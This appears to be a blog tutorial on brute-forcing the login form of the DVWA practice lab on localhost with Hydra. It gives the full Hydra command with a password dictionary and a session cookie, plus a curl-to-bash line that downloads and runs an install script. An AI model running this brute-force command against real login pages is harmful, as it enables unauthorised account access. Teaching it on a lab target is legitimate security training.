Brute Force Attack DVWA with Hydra
Hello! Today I’m going to share a simple command using a couple of tools to break the DVWA brute force lab.
Note: This is an educational tutorial. I am not responsible for any misuse of this tutorial.
Prerequisites
For this tutorial, I’m using an Ubuntu machine, but you can use Kali Linux as well. First, let’s install the necessary tools.
Step 1: Install and Configure DVWA
To get started, we need to configure the DVWA project. You can clone the repository and set up an Apache server with PHP. Alternatively, you can install DVWA via Docker using the following container https://hub.docker.com/r/vulnerables/web-dvwa:
sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"
Step 2: Install Hydra
Next, we need to install Hydra tool for password craking. Even if you’re using Kali Linux, you may need to configure it:
git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure
make
sudo make install
hydra
Step 3: Prepare the Password Dictionary
You will need a dictionary of passwords. If you’re using Kali Linux, you can use the crunch
tool to generate a password dictionary or install it on your linux machine. For this tutorial, I'm using a list of the 100k most used passwords from the Daniel Miessler repo.
Step 4: Identify the Target
Inspect the target page to identify the name of the password fields and the form submission method (GET in this case).
Step 5: Get the Failure Message
Identify the message that appears when the login fails, for example, “Username and/or password incorrect.”
Step 6: Get the Session ID
Obtain the session ID to avoid redirection. Depending on your browser, you can retrieve it in several ways, such as using a proxy.
Execute the Attack
The main command for the brute force attack with Hydra is:
hydra -L users.txt -P 100k-most-used-passwords-NCSC.txt localhost http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=medium; PHPSESSID=sessionID:Username and/or password incorrect." -V
Let’s explain the command
- -L list of users to crack
- -P dictionary of passwords
- -V mode verbose
- localhost address to attack
- http-get-form method GET used
- /DVWA/vulnerabilities/brute/ is the path
- Lastly, we pass the username and password variables to try
Finally, we get this result
This should guide you through the process of performing a brute force attack on DVWA using Hydra. Remember to use this knowledge responsibly.
Thanks for reading! I hope you found this tutorial helpful. Remember to use these tools responsibly. 🛡️💻
See you next time! 🚀😊